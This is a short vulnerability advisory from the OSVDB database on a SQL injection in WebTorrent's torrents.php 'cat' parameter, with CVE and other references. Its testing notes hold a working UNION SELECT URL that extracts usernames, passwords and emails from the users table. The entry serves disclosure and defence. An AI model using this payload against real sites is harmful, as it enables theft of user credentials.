WebTorrent torrents.php cat Variable SQL Injection

2006-08-17T22:53:15
ID OSVDB:29476
Type osvdb
Reporter OSVDB
Modified 2006-08-17T22:53:15

Description

Manual Testing Notes

http://[target]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

References:

ISS X-Force ID: 28426
Generic Exploit URL: http://www.milw0rm.com/exploits/2200
CVE-2006-4238
Bugtraq ID: 19569